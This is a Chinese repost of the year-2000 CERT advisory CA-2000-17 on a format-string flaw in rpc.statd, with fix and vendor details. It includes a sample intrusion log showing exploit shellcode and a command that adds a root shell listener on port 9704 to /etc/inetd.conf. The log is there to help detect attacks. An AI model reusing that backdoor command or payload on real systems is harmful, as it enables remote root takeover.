CERT 安全公告: rpc.statd输入检查问题
2008-04-09 04:35:42来源:互联网 阅读 ()
发布日期:2000-08-21
更新日期:2000-08-21
受影响系统:
不受影响系统:
运行rpc.statd服务的操作系统
描述:
CERT 安全公告: CA-2000-17 rpc.statd输入检查问题
发布时间: 2000-8-18
来源: CERT/CC
受影响系统:
* 运行rpc.statd服务的操作系统
综述:
CERT/CC 已经收到了很多关于rpc.statd可以被远程攻击的报告。这个程序缺省
安装在很多流行Linux系统中。请查看附录A获取受影响系统的详细信息。
关于这个漏洞的更多的信息可以在下列地址找到:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
* http://www.securityfocus.com/bid/1480
(NsFocus: 您也可以在这里看到相关漏洞的中文信息:
* http://security.nsfocus.com/showQuery.asp?bugID=692 )
I. 详细描述
rpc.statd程序将用户提供的数据作为一个格式串直接传给syslog()函数。如果
缺乏对输入数据的检查,恶意用户可以插入代码并以rpc.statd进程的全选执行,
通常是以root身份。
入侵迹象
下列内容是从一个被入侵的系统中得到的典型的日志信息:
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F ,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
如果您看到与上面内容类似的日志记录,我们建议您立刻按照我们的入侵检测列
表中的步骤检查您的系统。如果您相信您的系统已经被入侵了,请按照我们的入
侵恢复步骤来操作。
II. 影响
通过进行这种攻击,本地或者远程用户可以以rpc.statd进程的权限执行任意代码,
通常是root.
建议:
III. 解决方案
升级您的rpc.statd
请查看这篇公告的附录A,以得到针对您的系统的更新信息。如果您正在运行一
个有问题版本的rpc.statd,这个CERT/CC建议您使用相应的厂商的补丁。在升级以
后,确保重新启动了rpc.statd服务。
禁用rpc.statd服务
如果不能进行升级,CERT/CC推荐您禁用rpc.statd服务。我们建议您谨慎行事,
因为禁用这个进程可能会对NFS服务产生一些影响。
在防火墙上过滤掉不必要的端口
CERT/CC建议您在防火墙上过滤掉不需要的端口。这个方法并不是针对这个漏洞的,
但可以阻止外部入侵者攻击您的系统。特别是过滤111(portmapper)端口,外部攻击
者通常需要连结这个端口以获取rpc.statd的服务端口。
附录 A. 厂商信息
这部分包含了厂商提供的针对这篇公告的一些信息。当我们收到更多的信息时我们
会更新这个附录。如果你没有看到你的软件厂商的名字,那说明我们没有收到该厂
商的答复。请直接与您的厂商联系。
.
Berkeley Software Design, Inc. (BSDI)
不受此漏洞影响
Caldera, Inc.
不受此漏洞影响
Compaq
目前,Compaq正在调查对Compaq的rpc.statd服务的潜在影响。初步的测试表明Compaq
不受此漏洞影响。
Debian
http://www.debian.org/security/2000/20000719a
FreeBSD
不受此漏洞影响
NetBSD
NetBSD 1.4.x 和NetBSD 1.5 不受此漏洞影响;rpc.statd使用syslog()函数时将格式
化参数当成一个固定字符串对待。
OpenBSD
不受此漏洞影响
RedHat
http://www.redhat.com/support/errata/RHSA-2000-043-03.html
Silicon Graphics, Inc.
不受此漏洞影响
_________________________________________________________________
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
